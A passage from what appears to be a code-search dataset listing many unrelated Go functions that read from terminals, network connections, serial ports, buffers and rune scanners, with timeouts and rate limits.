nil\n\tcase ctrlL:\n\t\t// Clear screen.\n\t\treturn evClear, char, nil\n\tcase escKey:\n\t\t// Functions like arrows, home, etc.\n\t\tesc := make([]byte, 2)\n\t\t_, err = in.Read(esc)\n\t\tif err != nil {\n\t\t\treturn -1, char, err\n\t\t}\n\n\t\t// Home, end.\n\t\tif esc[0] == 'O' {\n\t\t\tswitch esc[1] {\n\t\t\tcase 'H':\n\t\t\t\t// Home.\n\t\t\t\treturn evHome, char, nil\n\t\t\tcase 'F':\n\t\t\t\t// End.\n\t\t\t\treturn evEnd, char, nil\n\t\t\t}\n\n\t\t\treturn evSkip, char, nil\n\t\t}\n\n\t\t// Arrows, delete, pgup, pgdown, insert.\n\t\tif esc[0] == '[' {\n\t\t\tswitch esc[1] {\n\t\t\tcase 'A':\n\t\t\t\t// Up.\n\t\t\t\treturn evUp, char, nil\n\t\t\tcase 'B':\n\t\t\t\t// Down.\n\t\t\t\treturn evDown, char, nil\n\t\t\tcase 'C':\n\t\t\t\t// Right.\n\t\t\t\treturn evRight, char, nil\n\t\t\tcase 'D':\n\t\t\t\t// Left.\n\t\t\t\treturn evLeft, char, nil\n\t\t\t}\n\n\t\t\t// Delete, pgup, pgdown, insert.\n\t\t\tif esc[1] > '0' && esc[1] < '7' {\n\t\t\t\textEsc := make([]byte, 3)\n\t\t\t\t_, err = in.Read(extEsc)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn -1, char, err\n\t\t\t\t}\n\n\t\t\t\tif extEsc[0] == '~' {\n\t\t\t\t\tswitch esc[1] {\n\t\t\t\t\tcase '2', '5', '6':\n\t\t\t\t\t\t// Insert, pgup, pgdown.\n\t\t\t\t\t\treturn evSkip, char, err\n\t\t\t\t\tcase '3':\n\t\t\t\t\t\t// Delete.\n\t\t\t\t\t\treturn evDel, char, err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn evSkip, char, nil\n}", "func readUntilShell(rChan chan string, errChan chan error) (string, error) {\n\tvar buffer bytes.Buffer\n\tvar totalTime time.Duration\n\tactive := false // used to track whether some output is just being generated\n\n\tfor {\n\t\tselect {\n\t\tcase str := <-rChan:\n\t\t\t// a line has been read\n\n\t\t\tif strings.HasSuffix(str, \"#\") {\n\t\t\t\t// shel found, consider the output as complete\n\t\t\t\treturn buffer.String(), nil\n\t\t\t}\n\t\t\tif str != \"\" {\n\t\t\t\t// non-empty string read, transition to the active state\n\t\t\t\tactive = true\n\t\t\t}\n\t\t\t// append the output to the buffer\n\t\t\tbuffer.WriteString(str + \"\\n\")\n\n\t\tcase <-time.After(cmdTimeout):\n\t\t\t// nothing read within the timeout\n\t\t\ttotalTime += cmdTimeout\n\n\t\t\tif active {\n\t\t\t\t// no more data for some time, but there was some activity before, consider the output as complete\n\t\t\t\tlog.Warn(\"No more response from the router within the timeout interval, considering the received output as complete.\")\n\t\t\t\treturn buffer.String(), nil\n\t\t\t} else if totalTime >= disconnectTimeout {\n\t\t\t\t// no data from the router at all, return disconnected error\n\t\t\t\tlog.Error(\"No response from the router, disconnected?\")\n\t\t\t\treturn \"\", errors.New(\"no response from the router, disconnected\")\n\t\t\t}\n\n\t\tcase err := <-errChan:\n\t\t\t// error occurred\n\t\t\tlog.Error(err)\n\t\t\treturn \"\", err\n\t\t}\n\t}\n}", "func (e *ObservableEditableBuffer) Read(q0 int, r []rune) (int, error) {\n\treturn e.f.Read(q0, r)\n}", "func (t *File) Read(b []byte) (int, error) {\n\t// Don't return 0, nil\n\tfor t.ring.Readable == 0 && !t.closed {\n\t\ttime.Sleep(PollIntervalFast) // Maybe swap this out for a notification at some point, but tbh, this works\n\t}\n\n\tif t.closed == true {\n\t\treturn 0, io.EOF\n\t}\n\n\t// Check for any waiting errors\n\tselect {\n\tcase err := <-t.errc:\n\t\tif err != nil { // Just in case XD\n\t\t\treturn 0, err\n\t\t}\n\tdefault:\n\t}\n\n\treturn t.ring.Read(b)\n}", "func (r *ChannelReader) Read(b []byte) (sz int, err error) {\n\tif len(b) == 0 {\n\t\treturn 0, io.ErrShortBuffer\n\t}\n\n\tfor {\n\t\tif len(r.buf) > 0 {\n\t\t\tif len(r.buf) <= len(b) {\n\t\t\t\tsz = len(r.buf)\n\t\t\t\tcopy(b, r.buf)\n\t\t\t\tr.buf = nil\n\t\t\t} else {\n\t\t\t\tcopy(b, r.buf)\n\t\t\t\tr.buf = r.buf[len(b):]\n\t\t\t\tsz = len(b)\n\t\t\t}\n\t\t\treturn sz, nil\n\t\t}\n\n\t\tvar ok bool\n\t\tif r.deadline.IsZero() {\n\t\t\tr.buf, ok = <-r.c\n\t\t} else {\n\t\t\ttimer := time.NewTimer(r.deadline.Sub(time.Now()))\n\t\t\tdefer timer.Stop()\n\n\t\t\tselect {\n\t\t\tcase r.buf, ok = <-r.c:\n\t\t\tcase <-timer.C:\n\t\t\t\treturn 0, context.DeadlineExceeded\n\t\t\t}\n\t\t}\n\t\tif len(r.buf) == 0 && !ok {\n\t\t\treturn 0, io.EOF\n\t\t}\n\t}\n}", "func FutureRead(r io.Reader, b []byte) func() (int, error) {\n\tdone := make(chan ioResult)\n\n\tgo func() {\n\t\tn, err := r.Read(b)\n\n\t\tdone <- ioResult{n, err}\n\t}()\n\n\treturn func() (int, error) {\n\t\tres := <-done\n\n\t\treturn res.n, res.err\n\t}\n}", "func readNextRune() rune {\n\tr, _, err := buf.ReadRune()\n\tif err != nil {\n\t\tr = rune(0) //\tEOF case\n\t}\n\treturn r\n}", "func ReadChar(buffer []byte, offset int) rune {\n return rune(ReadUInt8(buffer, offset))\n}", "func (t *watchdogReader) Read(p []byte) (int, error) {\n\t//read from underlying reader in chunks not larger than t.chunkSize\n\t//while resetting the watchdog timer before every read; the small chunk\n\t//size ensures that the timer does not fire when reading a large amount of\n\t//data from a slow connection\n\tstart := 0\n\tend := len(p)\n\tfor start < end {\n\t\tlength := end - start\n\t\tif length > t.chunkSize {\n\t\t\tlength = t.chunkSize\n\t\t}\n\n\t\tresetTimer(t.timer, t.timeout)\n\t\tn, err := t.reader.Read(p[start : start+length])\n\t\tstart += n\n\t\tif n == 0 || err != nil {\n\t\t\treturn start, err\n\t\t}\n\t}\n\n\tresetTimer(t.timer, t.timeout)\n\treturn start, nil\n}", "func (s *ss) getRune() (r rune) {\n\tr, _, err := s.ReadRune()\n\tif err != nil {\n\t\tif err == io.EOF {\n\t\t\treturn eof\n\t\t}\n\t\ts.error(err)\n\t}\n\treturn\n}", "func (rcr *RawRuneReader) ReadRune() (rune, error) {\n\tr, _, err := rcr.in.ReadRune()\n\t// fmt.Printf(\"rune: %#v\\r\\n\", r)\n\treturn r, err\n}", "func (w *WatchBuffer) Read(p []byte) (n int, err error) {\n\tif w.closed {\n\t\treturn 0, io.EOF\n\t}\n\tw.read <- p\n\tret := <-w.retc\n\treturn ret.n, ret.e\n}", "func (session *UDPMakeSession) Read(p []byte) (n int, err error) {\n\twc := cache{p, 0, make(chan int)}\n\tselect {\n\tcase session.recvChan <- wc:\n\t\tselect {\n\t\tcase n = <-wc.c:\n\t\tcase <-session.quitChan:\n\t\t\tn = -1\n\t\t}\n\tcase <-session.quitChan:\n\t\tn = -1\n\t}\n\t//log.Println(\"real recv\", l, string(b[:l]))\n\tif n == -1 {\n\t\treturn 0, errors.New(\"force quit for read error\")\n\t} else {\n\t\treturn n, nil\n\t}\n}", "func (session *UDPMakeSession) Read(p []byte) (n int, err error) {\n\twc := cache{p, 0, make(chan int)}\n\tselect {\n\tcase session.recvChan <- wc:\n\t\tselect {\n\t\tcase n = <-wc.c:\n\t\tcase <-session.quitChan:\n\t\t\tn = -1\n\t\t}\n\tcase <-session.quitChan:\n\t\tn = -1\n\t}\n\t//log.Println(\"real recv\", l, string(b[:l]))\n\tif n == -1 {\n\t\treturn 0, errors.New(\"force quit for read error\")\n\t} else {\n\t\treturn n, nil\n\t}\n}", "func ReadStdinWithTimeout(bufferSize int, timeoutSeconds time.Duration) []byte {\n\tc := make(chan []byte, 1)\n\n\t// Read in background to allow using a select for a timeout\n\tgo (func() {\n\t\tr := bufio.NewReader(os.Stdin)\n\t\tbuf := make([]byte, bufferSize)\n\n\t\tn, err := r.Read(buf)\n\t\tif err != nil && err != io.EOF {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tc <- buf[:n]\n\t})()\n\n\tselect {\n\tcase b := <-c:\n\t\treturn b\n\t// Timeout\n\tcase <-time.After(timeoutSeconds * time.Second):\n\t\tfmt.Println(\"No input received\")\n\t\tos.Exit(1)\n\t\treturn nil\n\t}\n}", "func (dev *Device) read(contxt context.Context, waitResponse bool) ([]byte, error) {\n\n\tcountError := 0\n\tlastEvent := time.Now()\n\t//TODO timeoutRead?\n\tfuncerr := func(err error) error {\n\t\tif err == nil {\n\t\t\treturn nil\n\t\t}\n\t\tlog.Printf(\"funcread err: %s\", err)\n\t\tswitch {\n\t\tcase errors.Is(err, os.ErrClosed):\n\t\t\treturn err\n\t\tcase errors.Is(err, io.ErrClosedPipe):\n\t\t\treturn err\n\t\tcase errors.Is(err, io.EOF):\n\t\t\tif time.Since(lastEvent) < 10*time.Microsecond {\n\t\t\t\tif countError > 3 {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tcountError++\n\t\t\t}\n\n\t\t\tlastEvent = time.Now()\n\t\t}\n\n\t\treturn nil\n\n\t}\n\n\t//TODO: limit to read\n\tbb := make([]byte, 0)\n\tindxb := 0\n\tlendata := uint32(0)\n\tfor {\n\n\t\tselect {\n\t\tcase <-contxt.Done():\n\t\t\treturn nil, fmt.Errorf(\"timeout error, %w\", smartcard.ErrComm)\n\t\tdefault:\n\t\t}\n\t\ttempb := make([]byte, 2048)\n\n\t\t// fmt.Println(\"execute read\")\n\n\t\tn, err := dev.port.Read(tempb)\n\t\tif err != nil && n <= 0 {\n\t\t\tif err := funcerr(err); err != nil {\n\t\t\t\t// log.Printf(\"0, err: %s\", err)\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tcontinue\n\t\t}\n\t\t// fmt.Printf(\"len: %v, [% X]\\n\", len(tempb[:n]), tempb[:n])\n\n\t\t// prepareBuffer := make([]byte, len(tempb[:n]))\n\n\t\t// copy(prepareBuffer, tempb[:n])\n\n\t\tbf := bytes.NewBuffer(tempb[:n])\n\t\t// fmt.Printf(\"len: %v, %v, %v, %v\\n\", len(prepareBuffer), cap(prepareBuffer), bf.Cap(), bf.Len())\n\n\t\tb := func() []byte {\n\t\t\tvar result []byte\n\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-contxt.Done():\n\t\t\t\t\treturn nil\n\t\t\t\tdefault:\n\t\t\t\t}\n\n\t\t\t\tlast, err := bf.ReadByte()\n\t\t\t\tif err == nil {\n\t\t\t\t\tif indxb <= 0 && last != '\\x02' {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\tindxb++\n\t\t\t\t\tbb = append(bb, last)\n\t\t\t\t} else {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\t// fmt.Printf(\"len: %v, last: %X, [% X]\\n\", len(bb), last, bb[:])\n\t\t\t\t// log.Println(\"2\")\n\t\t\t\tif len(bb) == 6 {\n\n\t\t\t\t\tlendata = binary.LittleEndian.Uint32(bb[2:6])\n\t\t\t\t\t// fmt.Printf(\"len data: %d\\n\", lendata)\n\t\t\t\t}\n\t\t\t\tif last == '\\x03' && len(bb) == 4 && bb[1] == bb[2] {\n\t\t\t\t\tresult = make([]byte, len(bb))\n\t\t\t\t\tcopy(result, bb[:])\n\t\t\t\t\tbb = make([]byte, 0)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif last == '\\x03' && len(bb) >= int(lendata)+1+10+1+1 {\n\t\t\t\t\t// fmt.Printf(\"tempb final: [% X]\\n\", bb[:])\n\n\t\t\t\t\tresult = make([]byte, len(bb))\n\t\t\t\t\tcopy(result, bb[:])\n\t\t\t\t\tbb = make([]byte, 0)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn result\n\t\t}()\n\n\t\tif waitResponse {\n\t\t\tif len(b) <= 0 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif len(b) == 4 && b[1] == b[2] && b[1] == 0x00 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif len(b) == 13 && bytes.Equal(b, FRAME_NACK) {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif b[len(b)-1] != 0x03 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\n\t\t// fmt.Printf(\"resul final: [% X]\\n\", b[:])\n\n\t\t// if indxb <= 0 {\n\t\t// \tif b == '\\x02' {\n\t\t// \t\ttempb[0] = b\n\t\t// \t\tindxb = 1\n\t\t// \t}\n\t\t// \tcontinue\n\t\t// }\n\n\t\t// tempb[indxb] = b\n\t\t// indxb++\n\t\t// fmt.Printf(\"len: %v, [% X]\\n\", indxb, tempb[:indxb])\n\t\t// // log.Println(\"2\")\n\t\t// if indxb == 6 {\n\t\t// \tlendata = binary.LittleEndian.Uint32(tempb[2:6])\n\t\t// }\n\t\t// if b == '\\x03' && indxb == 4 && tempb[1] == tempb[2] {\n\t\t// \tdest := make([]byte, indxb)\n\t\t// \tcopy(dest, tempb[:indxb])\n\t\t// \treturn dest, nil\n\t\t// }\n\t\t// if b == '\\x03' && indxb >= int(lendata)+1+10+1+1 {\n\t\t// \t// fmt.Printf(\"tempb final: [% X]\\n\", tempb[:indxb])\n\n\t\t// \tdest := make([]byte, indxb)\n\t\t// \tcopy(dest, tempb[:indxb])\n\t\t// \treturn dest, nil\n\t\t// }\n\t\tdest := make([]byte, len(b))\n\t\tcopy(dest, b[:])\n\t\tfmt.Printf(\"recv data: %v, [% X]\\n\", len(b), b[:])\n\t\treturn dest, nil\n\n\t}\n}", "func (r *LimiterReader) Read(p []byte) (int, error) {\n\ttc := time.Now()\n\twd, abc := r.lim.request(tc, len(p))\n\tif 0 < wd {\n\t\ttimer := time.NewTimer(wd)\n\t\tselect {\n\t\tcase <-timer.C:\n\t\tcase <-r.closedChan:\n\t\t\tif !timer.Stop() {\n\t\t\t\t<-timer.C\n\t\t\t}\n\t\t\treturn 0, ErrClosed\n\t\t}\n\t}\n\tn, err := r.rd.Read(p[:abc])\n\tif n < abc {\n\t\tr.lim.refund(abc - n)\n\t}\n\treturn n, err\n}", "func TestGetCloseBeforeRead(t *testing.T) {\n\n\tr, _, err := b.GetReader(getTests[4].path, getTests[4].config)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t//terr := fmt.Errorf(\"read error: 0 bytes read. expected: %d\", getTests[4].rSize)\n\tterr := fmt.Errorf(\"read error: %d bytes read. expected: %d\", 0, getTests[4].rSize)\n\ttmr := time.NewTimer(100 * time.Millisecond)\n\tdefer tmr.Stop()\n\tclosed := make(chan struct{})\n\tgo func() {\n\t\terr = r.Close()\n\t\tclose(closed)\n\t\tif err != nil && err.Error() != terr.Error() || err == nil {\n\t\t\tt.Errorf(\"expected error %v on Close, got %v\", terr, err)\n\t\t}\n\t}()\n\n\t// fail test if close does not return before timeout\n\tselect {\n\tcase <-closed:\n\t\ttmr.Stop()\n\tcase <-tmr.C:\n\t\tt.Fatal(\"getter close did not return before timeout\")\n\t}\n}", "func (tr *terminalReader) Read(p []byte) (n int, err error) {\n\t//Implementations of Read are discouraged from returning a zero byte count\n\t// with a nil error, except when len(p) == 0.\n\tif len(p) == 0 {\n\t\treturn 0, nil\n\t}\n\tif nil == tr.emulator {\n\t\treturn tr.readFromWrappedReader(p)\n\t}\n\treturn tr.emulator.ReadChars(tr.fd, tr.wrappedReader, p)\n}", "func (f FtpReadCloser) Read(p []byte) (int, error) {\n\treturn f.fd.Read(p)\n}", "func readData(conn net.Conn,\n\tdatalen uint16,\n\ttimeout time.Duration) ([]byte, error) {\n\trb := 0\n\ttb := int(datalen)\n\tdata := make([]byte, datalen)\n\n\tif timeout.Nanoseconds() != 0 {\n\t\t// The read operation will eventually timeout.\n\t\tconn.SetReadDeadline(time.Now().Add(timeout))\n\t} else {\n\t\t// The read operation will block forever whilst waiting for data.\n\t\tconn.SetReadDeadline(time.Time{})\n\t}\n\n\tfor rb < tb {\n\t\tnbytes, err := conn.Read(data[rb:])\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\trb += nbytes\n\t}\n\n\treturn data, nil\n}", "func DialReadTimeout(d time.Duration) DialOpt {\n\treturn func(do *dialOpts) {\n\t\tdo.readTimeout = d\n\t}\n}", "func (s *CancelableScanner) ReadOne(from <-chan *Job, to chan<- *Job) (string, error) {\n\tfor {\n\t\tselect {\n\t\t//case to <- <-from:\n\t\tcase j, ok := <-from:\n\t\t\tif ok {\n\t\t\t\tto <- j\n\t\t\t}\n\t\tcase <-s.ctx.Done():\n\t\t\treturn \"\", context.Canceled\n\t\tcase str, ok := <-s.data:\n\t\t\tif !ok {\n\t\t\t\treturn \"\", io.EOF\n\t\t\t}\n\t\t\treturn str, nil\n\t\tcase err, ok := <-s.err:\n\t\t\tif !ok {\n\t\t\t\treturn \"\", io.EOF\n\t\t\t}\n\t\t\treturn \"\", err\n\t\t}\n\t}\n}", "func (e *ObservableEditableBuffer) ReadC(q int) rune {\n\treturn e.f.ReadC(q)\n}", "func (cd *CloseDetector) Read(p []byte) (n int, err error) {\n\treturn cd.ReadCloser.Read(p)\n}", "func (r *Reader) ReadRune() (ch rune, size int, err error) {\n\tif r.i >= int64(len(r.s)) {\n\t\tr.prevRune = -1\n\t\treturn 0, 0, io.EOF\n\t}\n\tr.prevRune = int(r.i)\n\tif c := r.s[r.i]; c < utf8.RuneSelf {\n\t\tr.i++\n\t\treturn rune(c), 1, nil\n\t}\n\tch, size = utf8.DecodeRuneInString(r.s[r.i:])\n\tr.i += int64(size)\n\treturn\n}", "func (cr CancelableReader) Read(p []byte) (n int, err error) {\n\tif cr.Cancel {\n\t\tif r,is:=cr.Reader.(io.Closer);is{\n\t\t\tr.Close()\t\n\t\t}\n\t\treturn 0,io.EOF\n\n\t}\n\treturn cr.Reader.Read(p)\n}", "func read(addr string) error {\n\tconn, err := net.Dial(\"tcp\", addr)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\tif _, err = conn.Read(make([]byte, 1)); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *Scanner) read() rune {\n\tch, _, err := s.r.ReadRune()\n\tif err != nil {\n\t\treturn rune(0)\n\t}\n\n\ts.lineInfo.prev = s.lineInfo.pos\n\tif ch == '\\n' {\n\t\ts.lineInfo.line++\n\t\ts.lineInfo.pos = 0\n\t} else {\n\t\ts.lineInfo.pos++\n\t}\n\n\treturn ch\n}", "func ReadRune() {\n\tfmt.Println(\"----------------> ReadRune\")\n\tbuf := bytes.NewBufferString(\"好hello\")\n\tfmt.Println(buf.String())\n\n\t// read one rune from buf into b\n\tb, n, _ := buf.ReadRune()\n\n\t// buf=hello\n\tfmt.Println(buf.String())\n\n\t// b=好\n\tfmt.Println(string(b))\n\n\t// b=好 contains 3 bytes\n\tfmt.Println(n)\n\n\t// read one rune from buf into b\n\tb, n, _ = buf.ReadRune()\n\n\t// buf= ello\n\tfmt.Println(buf.String())\n\n\t// b=h\n\tfmt.Println(string(b))\n\n\t// b=h contains 1 byte\n\tfmt.Println(n)\n}", "func (manager Manager) ReadTimeout() time.Duration {\n\treturn manager.viperConfig.GetDuration(readTimeout)\n}", "func (p *randPort) Read(b []byte) (int, error) {\n\tif time.Since(p.ts) > time.Millisecond*50 {\n\t\tp.ts = time.Now()\n\t\taz := rand.Intn(450)\n\t\tel := rand.Intn(180)\n\t\tb = []byte(fmt.Sprintf(\"+%3d+%d\", az, el))\n\t\tatomic.AddUint64(&p.bytesRcvd, uint64(len(b)))\n\t\treturn len(b), nil\n\t}\n\treturn 0, io.EOF //simulate Timeout error\n}", "func (h *handler) readCommand() (*Command, error) {\n\t// spin off goroutine for listener on connection\n\tmsgChan := make(chan string)\n\terrChan := make(chan error)\n\tgo func() {\n\t\treader := bufio.NewReader(h.conn)\n\t\tmsg, err := reader.ReadString('\\n')\n\t\tif err != nil {\n\t\t\terrChan <- err\n\t\t\treturn\n\t\t}\n\n\t\tmsgChan <- msg\n\t}()\n\n\t// wait for command or timeout\n\ttimer := time.After(2 * time.Minute)\n\tvar msg string\n\tselect {\n\tcase msg = <-msgChan:\n\t\t//continue\n\tcase err := <-errChan:\n\t\treturn nil, err\n\tcase <-timer:\n\t\treturn nil, errTimeout\n\t}\n\n\th.logReceive(msg)\n\n\t// make sure command syntax is valid\n\tcommandRegex, err := regexp.Compile(\"^[a-zA-Z]{3,4} *.*\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif !commandRegex.MatchString(msg) {\n\t\treturn nil, fmt.Errorf(\"Unrecognized command: %s\", strings.Trim(msg, \"\\r\\n\"))\n\t}\n\n\t// parse command\n\tind := strings.IndexByte(msg, ' ')\n\tvar code, arg string\n\tif ind <= 0 {\n\t\tcode = strings.Trim(msg, \"\\r\\n\")\n\t\targ = \"\"\n\t} else {\n\t\tcode = msg[:ind]\n\t\targ = strings.Trim(msg[ind+1:], \"\\r\\n\")\n\t}\n\n\treturn &Command{\n\t\tCode: CommandCode(code),\n\t\tArugment: arg,\n\t}, nil\n}", "func (s *smlReader) readRune() (r rune, rc int, err error) {\n\tvar size int\n\ts.index++\n\tr, size, err = s.reader.ReadRune()\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\tswitch {\n\tcase size == 0:\n\t\trc = rcEOF\n\tcase r == '{':\n\t\trc = rcOpen\n\tcase r == '}':\n\t\trc = rcClose\n\tcase r == '^':\n\t\trc = rcEscape\n\tcase r == '!':\n\t\trc = rcExclamation\n\tcase r >= 'a' && r <= 'z':\n\t\trc = rcTag\n\tcase r >= 'A' && r <= 'Z':\n\t\trc = rcTag\n\tcase r >= '0' && r <= '9':\n\t\trc = rcTag\n\tcase r == '-' || r == ':':\n\t\trc = rcTag\n\tcase unicode.IsSpace(r):\n\t\trc = rcSpace\n\tdefault:\n\t\trc = rcText\n\t}\n\treturn\n}", "func (s *Reader) Read(p []byte) (int, error) {\n\tlimiter := s.getRateLimit()\n\tif limiter == nil {\n\t\treturn s.r.Read(p)\n\t}\n\tn, err := s.r.Read(p)\n\tif err != nil {\n\t\treturn n, err\n\t}\n\t// log.Printf(\"read: %d\", n)\n\tif err := limiter.WaitN(s.ctx, n); err != nil {\n\t\treturn n, err\n\t}\n\treturn n, nil\n}", "func FileSetReadDeadline(f *os.File, t time.Time) error", "func (r *ReaderCloser) Read(p []byte) (int, error) {\n\tcount, err := unix.Read(r.fd, p)\n\tif count < 0 && err != nil {\n\t\tcount = 0\n\t}\n\treturn count, err\n}", "func (s *Scanner) read() rune {\n\tch, _, err := s.r.ReadRune()\n\tif err != nil {\n\t\treturn eof\n\t}\n\tif ch == '\\n' {\n\t\ts.pos.Lines = append(s.pos.Lines, s.pos.Char)\n\t\ts.pos.Char = 0\n\t} else {\n\t\ts.pos.Char++\n\t}\n\treturn ch\n}", "func (p *Esc) Read(b []byte) (n int, err error) {\n\tsizeMsg := fmt.Sprintln(\"e:buf too small, expecting\", defaultSize, \"bytes.\")\n\tif len(b) < len(sizeMsg) {\n\t\treturn\n\t}\n\tif len(b) < defaultSize {\n\t\tn = copy(b, sizeMsg)\n\t\treturn\n\t}\n\n\t// use b as intermediate read buffer to avoid allocation\n\tn, err = p.in.Read(b)\n\t// p.syncBuffer can contain unprocessed bytes from last call.\n\tp.syncBuffer = append(p.syncBuffer, b[:n]...) // merge with leftovers\n\tn = 0\n\tif nil != err && io.EOF != err {\n\t\tn = copy(b, fmt.Sprintln(\"error:internal reader error \", err))\n\t\treturn\n\t}\n\n\t// Even err could be io.EOF some valid data possibly in p.syncBuffer.\n\t// In case of file input (JLINK usage) a plug off is not detectable here.\n\n\tp.bc = len(p.syncBuffer) // intermediade assingment for better error tracking\n\tif p.bc < 4 {\n\t\treturn // wait\n\t}\n\tp.b = b\n\tif 0xec != p.syncBuffer[0] { // 0xec == 236\n\t\treturn p.outOfSync(\"start byte is not 0xEC\")\n\t}\n\tlengthCode := p.syncBuffer[1]\n\tif 0xde == lengthCode { // 0xde == 222\n\t\treturn p.outOfSync(\"0xEC is followed by 0xDE, so no start byte\")\n\t}\n\ttriceID := int(binary.BigEndian.Uint16(p.syncBuffer[2:4]))\n\tvar ok bool\n\tp.trice, ok = p.lut[triceID]\n\tif !ok { // unknown id\n\t\treturn p.outOfSync(fmt.Sprint(\"unknown ID \", triceID))\n\t}\n\tp.bc = p.bytesCount(lengthCode) // payload plus header\n\tif p.expectedByteCount() != p.bc {\n\t\treturn p.outOfSync(fmt.Sprint(\"trice.Type \", p.trice.Type, \" with not matching length code \", lengthCode))\n\t}\n\tif len(p.syncBuffer) < 4+p.bc { // header plus payload\n\t\treturn // wait\n\t}\n\t// ID and count are ok\n\treturn p.sprintTrice()\n}", "func ReadTimeout(v time.Duration) Option {\n\treturn optionSetter(func(opt *Options) {\n\t\topt.ReadTimeout = v\n\t})\n}", "func (h *ReOpen) Read(p []byte) (n int, err error) {\n\th.mu.Lock()\n\tdefer h.mu.Unlock()\n\tif h.err != nil {\n\t\t// return a previous error if there is one\n\t\treturn n, h.err\n\t}\n\tn, err = h.rc.Read(p)\n\tif err != nil {\n\t\th.err = err\n\t}\n\th.read += int64(n)\n\tif err != nil && err != io.EOF && !fserrors.IsNoLowLevelRetryError(err) {\n\t\t// close underlying stream\n\t\th.opened = false\n\t\t_ = h.rc.Close()\n\t\t// reopen stream, clearing error if successful\n\t\tfs.Debugf(h.src, \"Reopening on read failure after %d bytes: retry %d/%d: %v\", h.read, h.tries, h.maxTries, err)\n\t\tif h.open() == nil {\n\t\t\terr = nil\n\t\t}\n\t}\n\treturn n, err\n}", "func (p *pipe) readFrom(r io.Reader) (read int64, failure error) {\n\tfor {\n\t\t// Wait until some space frees up\n\t\tsafeFree, err := p.inputWait()\n\t\tif err != nil {\n\t\t\treturn read, err\n\t\t}\n\t\t// Try to fill the buffer either till the reader position, or the end\n\t\tlimit := p.inPos + safeFree\n\t\tif limit > p.size {\n\t\t\tlimit = p.size\n\t\t}\n\t\tnr, err := r.Read(p.buffer[p.inPos:limit])\n\t\tread += int64(nr)\n\n\t\t// Update the pipe input state and handle any occurred errors\n\t\tp.inputAdvance(nr)\n\t\tif err == io.EOF {\n\t\t\treturn read, nil\n\t\t}\n\t\tif err != nil {\n\t\t\treturn read, err\n\t\t}\n\t}\n}", "func (r *ReadUntil) WaitForClose(timeout time.Duration) error {\n\tselect {\n\tcase <-r.shutSig.HasClosedChan():\n\tcase <-time.After(timeout):\n\t\treturn component.ErrTimeout\n\t}\n\treturn nil\n}", "func (l *lazyConn) Read(p []byte) (n int, err error) {\n\tl.m.Lock()\n\tdefer l.m.Unlock()\n\n\tif l.conn == nil {\n\t\tif err := l.connect(); err != nil {\n\t\t\treturn 0, io.ErrUnexpectedEOF\n\t\t}\n\t}\n\n\tn, err = l.withTimeout().Read(p)\n\tswitch {\n\tcase err == io.EOF:\n\t\tfallthrough\n\tcase err == io.ErrUnexpectedEOF:\n\t\tl.conn = nil\n\t}\n\treturn n, err\n}", "func readCString(r io.Reader) (s string, err error) {\n\tvar be [1]byte\n\tcharBuf := be[0:1]\n\n\tvar accum bytes.Buffer\n\n\tfor {\n\t\tn, err := r.Read(charBuf)\n\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\t// Handle the case of no error, yet no bytes were\n\t\t// retrieved.\n\t\tif n < 1 {\n\t\t\tcontinue\n\t\t}\n\n\t\tswitch charBuf[0] {\n\t\tcase '\\000':\n\t\t\treturn string(accum.Bytes()), nil\n\t\tdefault:\n\t\t\taccum.Write(charBuf)\n\t\t}\n\t}\n\n\tpanic(\"Oh snap\")\n}", "func (s *ss) mustReadRune() (r rune) {\n\tr = s.getRune()\n\tif r == eof {\n\t\ts.error(io.ErrUnexpectedEOF)\n\t}\n\treturn\n}", "func (in *InBuffer) ReadRune() rune {\n\tx, size := utf8.DecodeRune(in.Data[in.ReadPos:])\n\tin.ReadPos += size\n\treturn x\n}", "func (in *InBuffer) ReadRune() rune {\n\tx, size := utf8.DecodeRune(in.Data[in.ReadPos:])\n\tin.ReadPos += size\n\treturn x\n}", "func (rd *Reader) ReadRune() (rune, int, error) {\n\tif rd.current >= len(rd.buffer) {\n\t\tif err := rd.feedBuffer(); err != nil {\n\t\t\treturn EOF, 0, err\n\t\t}\n\t}\n\tr := rd.buffer[rd.current]\n\trd.current++\n\tif r == badRune {\n\t\treturn utf8.RuneError, 1, nil\n\t}\n\tif r == EOF {\n\t\treturn EOF, 0, nil\n\t}\n\treturn r, utf8.RuneLen(r), nil\n}", "func (r *reader) read() error {\n\tn, err := r.r.Read(r.b)\n\tif err != nil {\n\t\treturn trace.Wrap(err)\n\t}\n\tif n < 1 {\n\t\treturn trace.BadParameter(\"unexpected error, read 0 bytes\")\n\t}\n\n\tswitch r.b[0] {\n\tcase OKByte:\n\t\treturn nil\n\tcase WarnByte, ErrByte:\n\t\tr.s.Scan()\n\t\tif err := r.s.Err(); err != nil {\n\t\t\treturn trace.Wrap(err)\n\t\t}\n\t\treturn trace.BadParameter(r.s.Text())\n\t}\n\treturn trace.BadParameter(\"unrecognized command: %v\", r.b)\n}", "func (r *Reader) readRune() (rune, error) {\n\tr1, _, err := r.r.ReadRune()\n\n\t// Handle \\r\\n here. We make the simplifying assumption that\n\t// anytime \\r is followed by \\n that it can be folded to \\n.\n\t// We will not detect text which contains both \\r\\n and bare \\n.\n\tif r1 == '\\r' 